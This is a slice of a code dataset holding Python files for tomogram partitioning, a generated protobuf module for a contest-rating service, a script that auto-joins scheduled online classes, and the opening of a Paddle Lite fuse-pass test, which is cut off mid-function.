code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import argparse
import sys
parser = argparse.ArgumentParser()
parser.add_argument("-config_file", "--config_file", type=str)
parser.add_argument("-pythonpath", "--pythonpath", type=str)
parser.add_argument("-fold", "--fold", type=str, default="None")
parser.add_argument("-tomo_name", "--tomo_name", type=str)
args = parser.parse_args()
pythonpath = args.pythonpath
sys.path.append(pythonpath)
import os
import ast
import numpy as np
import pandas as pd
from constants.dataset_tables import DatasetTableHeader
from file_actions.readers.tomograms import load_tomogram
from paths.pipeline_dirs import testing_partition_path
from tomogram_utils.volume_actions.actions import \
partition_raw_intersecting_mask
from constants.config import Config
config_file = args.config_file
tomo_name = args.tomo_name
fold = ast.literal_eval(args.fold)
config = Config(args.config_file)
snakemake_pattern = config.work_dir + "/testing_data/" + tomo_name + \
"/.test_partition.{fold}.done".format(fold=str(fold))
print("tomo_name", tomo_name)
partition_output_dir, partition_path = testing_partition_path(output_dir=config.work_dir,
tomo_name=tomo_name,
fold=fold)
print("partition_path =", partition_path)
os.makedirs(partition_output_dir, exist_ok=True)
if os.path.exists(partition_path):
print("Exiting, path exists.")
else:
overlap = config.overlap
box_size = config.box_size
box_shape = (box_size, box_size, box_size)
DTHeader = DatasetTableHeader(processing_tomo=config.processing_tomo, filtering_mask=config.region_mask)
df = pd.read_csv(config.dataset_table, dtype={"tomo_name": str})
df[DTHeader.tomo_name] = df[DTHeader.tomo_name].astype(str)
tomo_df = df[df[DTHeader.tomo_name] == tomo_name]
print(tomo_name, config.processing_tomo, tomo_df)
path_to_raw = tomo_df.iloc[0][config.processing_tomo]
intersecting_mask_path = tomo_df.iloc[0][config.region_mask]
raw_dataset = load_tomogram(path_to_dataset=path_to_raw, dtype=float)
if isinstance(intersecting_mask_path, float):
print("No region mask file available.")
intersecting_mask = np.ones_like(raw_dataset, dtype=np.int8)
else:
intersecting_mask_path = tomo_df.iloc[0][config.region_mask]
intersecting_mask = load_tomogram(path_to_dataset=intersecting_mask_path)
mask_shape = intersecting_mask.shape
dataset_shape = raw_dataset.shape
minimum_shape = [np.min([data_dim, mask_dim]) for
data_dim, mask_dim in zip(dataset_shape, mask_shape)]
minz, miny, minx = minimum_shape
intersecting_mask = intersecting_mask[:minz, :miny, :minx]
raw_dataset = raw_dataset[:minz, :miny, :minx]
partition_raw_intersecting_mask(dataset=raw_dataset,
mask_dataset=intersecting_mask,
output_h5_file_path=partition_path,
subtomo_shape=box_shape,
overlap=overlap)
# For snakemake
with open(snakemake_pattern, "w") as f:
print("Creating snakemake pattern") | 3d_cnn/scripts/generate_prediction_partition.py | import argparse
import sys
parser = argparse.ArgumentParser()
parser.add_argument("-config_file", "--config_file", type=str)
parser.add_argument("-pythonpath", "--pythonpath", type=str)
parser.add_argument("-fold", "--fold", type=str, default="None")
parser.add_argument("-tomo_name", "--tomo_name", type=str)
args = parser.parse_args()
pythonpath = args.pythonpath
sys.path.append(pythonpath)
import os
import ast
import numpy as np
import pandas as pd
from constants.dataset_tables import DatasetTableHeader
from file_actions.readers.tomograms import load_tomogram
from paths.pipeline_dirs import testing_partition_path
from tomogram_utils.volume_actions.actions import \
partition_raw_intersecting_mask
from constants.config import Config
config_file = args.config_file
tomo_name = args.tomo_name
fold = ast.literal_eval(args.fold)
config = Config(args.config_file)
snakemake_pattern = config.work_dir + "/testing_data/" + tomo_name + \
"/.test_partition.{fold}.done".format(fold=str(fold))
print("tomo_name", tomo_name)
partition_output_dir, partition_path = testing_partition_path(output_dir=config.work_dir,
tomo_name=tomo_name,
fold=fold)
print("partition_path =", partition_path)
os.makedirs(partition_output_dir, exist_ok=True)
if os.path.exists(partition_path):
print("Exiting, path exists.")
else:
overlap = config.overlap
box_size = config.box_size
box_shape = (box_size, box_size, box_size)
DTHeader = DatasetTableHeader(processing_tomo=config.processing_tomo, filtering_mask=config.region_mask)
df = pd.read_csv(config.dataset_table, dtype={"tomo_name": str})
df[DTHeader.tomo_name] = df[DTHeader.tomo_name].astype(str)
tomo_df = df[df[DTHeader.tomo_name] == tomo_name]
print(tomo_name, config.processing_tomo, tomo_df)
path_to_raw = tomo_df.iloc[0][config.processing_tomo]
intersecting_mask_path = tomo_df.iloc[0][config.region_mask]
raw_dataset = load_tomogram(path_to_dataset=path_to_raw, dtype=float)
if isinstance(intersecting_mask_path, float):
print("No region mask file available.")
intersecting_mask = np.ones_like(raw_dataset, dtype=np.int8)
else:
intersecting_mask_path = tomo_df.iloc[0][config.region_mask]
intersecting_mask = load_tomogram(path_to_dataset=intersecting_mask_path)
mask_shape = intersecting_mask.shape
dataset_shape = raw_dataset.shape
minimum_shape = [np.min([data_dim, mask_dim]) for
data_dim, mask_dim in zip(dataset_shape, mask_shape)]
minz, miny, minx = minimum_shape
intersecting_mask = intersecting_mask[:minz, :miny, :minx]
raw_dataset = raw_dataset[:minz, :miny, :minx]
partition_raw_intersecting_mask(dataset=raw_dataset,
mask_dataset=intersecting_mask,
output_h5_file_path=partition_path,
subtomo_shape=box_shape,
overlap=overlap)
# For snakemake
with open(snakemake_pattern, "w") as f:
print("Creating snakemake pattern") | 0.295535 | 0.124852 |
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='contest.proto',
package='',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\rcontest.proto\"\xbf\x01\n\x0b\x43ontestData\x12\x0e\n\x06handle\x18\x01 \x01(\t\x12\x13\n\x0bprofile_url\x18\x02 \x01(\t\x12\x0e\n\x06rating\x18\x03 \x01(\x05\x12\x0e\n\x06length\x18\x04 \x01(\x05\x12\"\n\x04\x64\x61ta\x18\x05 \x03(\x0b\x32\x14.ContestData.Contest\x1aG\n\x07\x43ontest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\t\x12\x11\n\ttimestamp\x18\x03 \x01(\x05\x12\x0e\n\x06rating\x18\x04 \x01(\x05\"6\n\x12\x43ontestDataRequest\x12\x10\n\x08platform\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\t2I\n\x12\x43ontestDataService\x12\x33\n\x0eGetContestData\x12\x13.ContestDataRequest\x1a\x0c.ContestDatab\x06proto3'
)
_CONTESTDATA_CONTEST = _descriptor.Descriptor(
name='Contest',
full_name='ContestData.Contest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ContestData.Contest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='url', full_name='ContestData.Contest.url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timestamp', full_name='ContestData.Contest.timestamp', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rating', full_name='ContestData.Contest.rating', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=138,
serialized_end=209,
)
_CONTESTDATA = _descriptor.Descriptor(
name='ContestData',
full_name='ContestData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='handle', full_name='ContestData.handle', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='profile_url', full_name='ContestData.profile_url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rating', full_name='ContestData.rating', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='length', full_name='ContestData.length', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='ContestData.data', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_CONTESTDATA_CONTEST, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=18,
serialized_end=209,
)
_CONTESTDATAREQUEST = _descriptor.Descriptor(
name='ContestDataRequest',
full_name='ContestDataRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='platform', full_name='ContestDataRequest.platform', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='handle', full_name='ContestDataRequest.handle', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=211,
serialized_end=265,
)
_CONTESTDATA_CONTEST.containing_type = _CONTESTDATA
_CONTESTDATA.fields_by_name['data'].message_type = _CONTESTDATA_CONTEST
DESCRIPTOR.message_types_by_name['ContestData'] = _CONTESTDATA
DESCRIPTOR.message_types_by_name['ContestDataRequest'] = _CONTESTDATAREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ContestData = _reflection.GeneratedProtocolMessageType('ContestData', (_message.Message,), {
'Contest' : _reflection.GeneratedProtocolMessageType('Contest', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATA_CONTEST,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestData.Contest)
})
,
'DESCRIPTOR' : _CONTESTDATA,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestData)
})
_sym_db.RegisterMessage(ContestData)
_sym_db.RegisterMessage(ContestData.Contest)
ContestDataRequest = _reflection.GeneratedProtocolMessageType('ContestDataRequest', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATAREQUEST,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestDataRequest)
})
_sym_db.RegisterMessage(ContestDataRequest)
_CONTESTDATASERVICE = _descriptor.ServiceDescriptor(
name='ContestDataService',
full_name='ContestDataService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=267,
serialized_end=340,
methods=[
_descriptor.MethodDescriptor(
name='GetContestData',
full_name='ContestDataService.GetContestData',
index=0,
containing_service=None,
input_type=_CONTESTDATAREQUEST,
output_type=_CONTESTDATA,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_CONTESTDATASERVICE)
DESCRIPTOR.services_by_name['ContestDataService'] = _CONTESTDATASERVICE
# @@protoc_insertion_point(module_scope) | proto/contest_pb2.py | """Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='contest.proto',
package='',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\rcontest.proto\"\xbf\x01\n\x0b\x43ontestData\x12\x0e\n\x06handle\x18\x01 \x01(\t\x12\x13\n\x0bprofile_url\x18\x02 \x01(\t\x12\x0e\n\x06rating\x18\x03 \x01(\x05\x12\x0e\n\x06length\x18\x04 \x01(\x05\x12\"\n\x04\x64\x61ta\x18\x05 \x03(\x0b\x32\x14.ContestData.Contest\x1aG\n\x07\x43ontest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\t\x12\x11\n\ttimestamp\x18\x03 \x01(\x05\x12\x0e\n\x06rating\x18\x04 \x01(\x05\"6\n\x12\x43ontestDataRequest\x12\x10\n\x08platform\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\t2I\n\x12\x43ontestDataService\x12\x33\n\x0eGetContestData\x12\x13.ContestDataRequest\x1a\x0c.ContestDatab\x06proto3'
)
_CONTESTDATA_CONTEST = _descriptor.Descriptor(
name='Contest',
full_name='ContestData.Contest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ContestData.Contest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='url', full_name='ContestData.Contest.url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timestamp', full_name='ContestData.Contest.timestamp', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rating', full_name='ContestData.Contest.rating', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=138,
serialized_end=209,
)
_CONTESTDATA = _descriptor.Descriptor(
name='ContestData',
full_name='ContestData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='handle', full_name='ContestData.handle', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='profile_url', full_name='ContestData.profile_url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rating', full_name='ContestData.rating', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='length', full_name='ContestData.length', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='ContestData.data', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_CONTESTDATA_CONTEST, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=18,
serialized_end=209,
)
_CONTESTDATAREQUEST = _descriptor.Descriptor(
name='ContestDataRequest',
full_name='ContestDataRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='platform', full_name='ContestDataRequest.platform', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='handle', full_name='ContestDataRequest.handle', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=211,
serialized_end=265,
)
_CONTESTDATA_CONTEST.containing_type = _CONTESTDATA
_CONTESTDATA.fields_by_name['data'].message_type = _CONTESTDATA_CONTEST
DESCRIPTOR.message_types_by_name['ContestData'] = _CONTESTDATA
DESCRIPTOR.message_types_by_name['ContestDataRequest'] = _CONTESTDATAREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ContestData = _reflection.GeneratedProtocolMessageType('ContestData', (_message.Message,), {
'Contest' : _reflection.GeneratedProtocolMessageType('Contest', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATA_CONTEST,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestData.Contest)
})
,
'DESCRIPTOR' : _CONTESTDATA,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestData)
})
_sym_db.RegisterMessage(ContestData)
_sym_db.RegisterMessage(ContestData.Contest)
ContestDataRequest = _reflection.GeneratedProtocolMessageType('ContestDataRequest', (_message.Message,), {
'DESCRIPTOR' : _CONTESTDATAREQUEST,
'__module__' : 'contest_pb2'
# @@protoc_insertion_point(class_scope:ContestDataRequest)
})
_sym_db.RegisterMessage(ContestDataRequest)
_CONTESTDATASERVICE = _descriptor.ServiceDescriptor(
name='ContestDataService',
full_name='ContestDataService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=267,
serialized_end=340,
methods=[
_descriptor.MethodDescriptor(
name='GetContestData',
full_name='ContestDataService.GetContestData',
index=0,
containing_service=None,
input_type=_CONTESTDATAREQUEST,
output_type=_CONTESTDATA,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_CONTESTDATASERVICE)
DESCRIPTOR.services_by_name['ContestDataService'] = _CONTESTDATASERVICE
# @@protoc_insertion_point(module_scope) | 0.324771 | 0.127979 |
from datetime import date
from datetime import timedelta
import datetime
import pickle
import os
from pickle import FALSE
from scripts.timetable import tt_runner
import scripts.webPageHandler as wph
import scripts.classroomaccess as ma
import scripts.calendaraccess as cac
import time
import pyfiglet
import sys
days = ['monday','tuesday','wednesday','thursday','friday','saturday','sunday']
def twelve_to_24(twelvetime):
temp = twelvetime.split(' ')
if temp[1] == 'AM':
min = temp[0].split(':')[1]
hr = temp[0].split(':')[0]
if hr == '12':
hr = '00'
fin = hr + ':' + min + ':' + '00'
else:
hr = int(temp[0].split(':')[0])
if hr != 12:
hr += 12
min = temp[0].split(':')[1]
fin = str(hr)+':'+min+':'+'00'
return fin
def compare_times(timeone,timetwo): #the function return 0 if timeone is greater and return 1 if timetwo is greater 12:45 am, 945 am , expected op is 1
t1 = twelve_to_24(timeone).split(':')
t2 = twelve_to_24(timetwo).split(':')
if t1[0] > t2[0]:
return 0
elif t1[0] < t2[0]:
return 1
else:
if t1[1] > t2[1]:
return 0
else:
return 1
def get_next_class(ctime,todlist,x,tomlist,y,dayafterlist,z): #The function obtains the next class time and day
#print(todlist)
for i in todlist:
#print(i)
if compare_times(ctime,i[1]) == 1:
return [i,0]
if len(tomlist) != 0:
return [tomlist[0],1]
else:
return [dayafterlist[0],2]
def calculate_seconds(cxtime,nxclass): #The function returns the difference between timea and timeb in SECONDS
final_time = 0
if nxclass[1] == 0:
final_time = 0
elif nxclass[1] == 1:
final_time = 86400
else:
final_time = 172800
timea = twelve_to_24(cxtime)
timeb = twelve_to_24(nxclass[0][1])
fmt = '%H:%M:%S'
tdelta = datetime.datetime.strptime(timeb, fmt) - datetime.datetime.strptime(timea, fmt)
seconds = int(tdelta.total_seconds())
final_time += seconds
return final_time
def mainrunner():
awesome_disp = pyfiglet.figlet_format('AUTOMEET')
while(1):
os.system('cls' if os.name == 'nt' else 'clear')
print(awesome_disp)
creds = tt_runner()
today = days[datetime.date.today().weekday()] #days gets the value(string) of the current day
tom = datetime.date.today() + datetime.timedelta(days=1)
datom = datetime.date.today() + datetime.timedelta(days=2)
tomorrow = days[tom.weekday()]
dayaftertom = days[datom.weekday()]
file_handler = open(os.getcwd()+'\\timetables\\'+today+'.pkl',"rb")
today_classes_list = pickle.load(file_handler)
file_handler.close()
file_handler = open(os.getcwd()+'\\timetables\\'+tomorrow+'.pkl',"rb")
tomorrow_classes_list = pickle.load(file_handler)
file_handler.close()
file_handler = open(os.getcwd()+'\\timetables\\'+dayaftertom+'.pkl',"rb")
dayafter_classes_list = pickle.load(file_handler)
file_handler.close()
current_time = datetime.datetime.now().time().strftime("%I:%M %p")
next_class = get_next_class(current_time,today_classes_list,today,tomorrow_classes_list,tomorrow,dayafter_classes_list,dayaftertom)
remaining_time = calculate_seconds(current_time,next_class)
print('Next Class',next_class[0][0], 'is at', next_class[0][1], 'and starts in', int(remaining_time)//60,'minutes')
for i in range(remaining_time-300,0,-1):
sys.stdout.write(' '+str(i)+' seconds remaining' + '\r')
sys.stdout.flush()
time.sleep(1) #sleeps the program until 5 min before before the upcoming class
class_link = cac.getthelink(next_class,creds) #this function should be in the calendaraccess.py file and should return either the link of the google meet or none
if class_link == None:
for i in range(480,0,-1):
sys.stdout.write(' '+str(i)+' seconds remaining' + '\r')
sys.stdout.flush()
time.sleep(1)
class_link = ma.get_the_link(next_class,creds)
print('\n\n','Class Link is ',class_link)
wph.web_page_opener(class_link) #this function should be present in the webpagehandler python file and should accept the link and open it in the current profile, NOTE: webpageopener function will also close the webpage upon the class getting over | scripts/main.py |
from datetime import date
from datetime import timedelta
import datetime
import pickle
import os
from pickle import FALSE
from scripts.timetable import tt_runner
import scripts.webPageHandler as wph
import scripts.classroomaccess as ma
import scripts.calendaraccess as cac
import time
import pyfiglet
import sys
days = ['monday','tuesday','wednesday','thursday','friday','saturday','sunday']
def twelve_to_24(twelvetime):
temp = twelvetime.split(' ')
if temp[1] == 'AM':
min = temp[0].split(':')[1]
hr = temp[0].split(':')[0]
if hr == '12':
hr = '00'
fin = hr + ':' + min + ':' + '00'
else:
hr = int(temp[0].split(':')[0])
if hr != 12:
hr += 12
min = temp[0].split(':')[1]
fin = str(hr)+':'+min+':'+'00'
return fin
def compare_times(timeone,timetwo): #the function return 0 if timeone is greater and return 1 if timetwo is greater 12:45 am, 945 am , expected op is 1
t1 = twelve_to_24(timeone).split(':')
t2 = twelve_to_24(timetwo).split(':')
if t1[0] > t2[0]:
return 0
elif t1[0] < t2[0]:
return 1
else:
if t1[1] > t2[1]:
return 0
else:
return 1
def get_next_class(ctime,todlist,x,tomlist,y,dayafterlist,z): #The function obtains the next class time and day
#print(todlist)
for i in todlist:
#print(i)
if compare_times(ctime,i[1]) == 1:
return [i,0]
if len(tomlist) != 0:
return [tomlist[0],1]
else:
return [dayafterlist[0],2]
def calculate_seconds(cxtime,nxclass): #The function returns the difference between timea and timeb in SECONDS
final_time = 0
if nxclass[1] == 0:
final_time = 0
elif nxclass[1] == 1:
final_time = 86400
else:
final_time = 172800
timea = twelve_to_24(cxtime)
timeb = twelve_to_24(nxclass[0][1])
fmt = '%H:%M:%S'
tdelta = datetime.datetime.strptime(timeb, fmt) - datetime.datetime.strptime(timea, fmt)
seconds = int(tdelta.total_seconds())
final_time += seconds
return final_time
def mainrunner():
awesome_disp = pyfiglet.figlet_format('AUTOMEET')
while(1):
os.system('cls' if os.name == 'nt' else 'clear')
print(awesome_disp)
creds = tt_runner()
today = days[datetime.date.today().weekday()] #days gets the value(string) of the current day
tom = datetime.date.today() + datetime.timedelta(days=1)
datom = datetime.date.today() + datetime.timedelta(days=2)
tomorrow = days[tom.weekday()]
dayaftertom = days[datom.weekday()]
file_handler = open(os.getcwd()+'\\timetables\\'+today+'.pkl',"rb")
today_classes_list = pickle.load(file_handler)
file_handler.close()
file_handler = open(os.getcwd()+'\\timetables\\'+tomorrow+'.pkl',"rb")
tomorrow_classes_list = pickle.load(file_handler)
file_handler.close()
file_handler = open(os.getcwd()+'\\timetables\\'+dayaftertom+'.pkl',"rb")
dayafter_classes_list = pickle.load(file_handler)
file_handler.close()
current_time = datetime.datetime.now().time().strftime("%I:%M %p")
next_class = get_next_class(current_time,today_classes_list,today,tomorrow_classes_list,tomorrow,dayafter_classes_list,dayaftertom)
remaining_time = calculate_seconds(current_time,next_class)
print('Next Class',next_class[0][0], 'is at', next_class[0][1], 'and starts in', int(remaining_time)//60,'minutes')
for i in range(remaining_time-300,0,-1):
sys.stdout.write(' '+str(i)+' seconds remaining' + '\r')
sys.stdout.flush()
time.sleep(1) #sleeps the program until 5 min before before the upcoming class
class_link = cac.getthelink(next_class,creds) #this function should be in the calendaraccess.py file and should return either the link of the google meet or none
if class_link == None:
for i in range(480,0,-1):
sys.stdout.write(' '+str(i)+' seconds remaining' + '\r')
sys.stdout.flush()
time.sleep(1)
class_link = ma.get_the_link(next_class,creds)
print('\n\n','Class Link is ',class_link)
wph.web_page_opener(class_link) #this function should be present in the webpagehandler python file and should accept the link and open it in the current profile, NOTE: webpageopener function will also close the webpage upon the class getting over | 0.160003 | 0.165627 |
import sys
sys.path.append('..')
from auto_scan_test import FusePassAutoScanTest
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st
class TestSqueeze2MatmulFusePass(FusePassAutoScanTest):
def __init__(self, *args, **kwargs):
FusePassAutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(
TargetType.ARM,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 4])
#x86
self.enable_testing_on_place(
TargetType.X86,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 4])
#Metal
metal_places = [
Place(TargetType.Metal, PrecisionType.FP32,
DataLayoutType.MetalTexture2DArray),
Place(TargetType.Metal, PrecisionType.FP16,
DataLayoutType.MetalTexture2DArray),
Place(TargetType.ARM, PrecisionType.FP32),
Place(TargetType.Host, PrecisionType.FP32)
]
self.enable_testing_on_place(places=metal_places)
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
target_type = predictor_config.target()
in_shape = list(program_config.inputs["squeeze2_input_x"].shape)
if target_type in [TargetType.Metal]:
if in_shape[1] != 1:
return False
return True
def sample_program_configs(self, draw):
alpha = draw(st.floats(min_value=1, max_value=1)) #required in pass
x_num_col_dims = draw(st.floats(min_value=0, max_value=1))
y_num_col_dims = draw(st.floats(min_value=0, max_value=1))
int32_values_1 = draw(st.integers(min_value=1, max_value=40))
int32_values_2 = draw(st.integers(min_value=1, max_value=40))
int32_values_3 = draw(st.integers(min_value=1, max_value=40))
squeeze2_input_shape = [int32_values_1, int32_values_2, 1, 1]
matmul_input_shape = [squeeze2_input_shape[1], int32_values_3]
scale_x = draw(st.sampled_from([0.1, 1.1]))
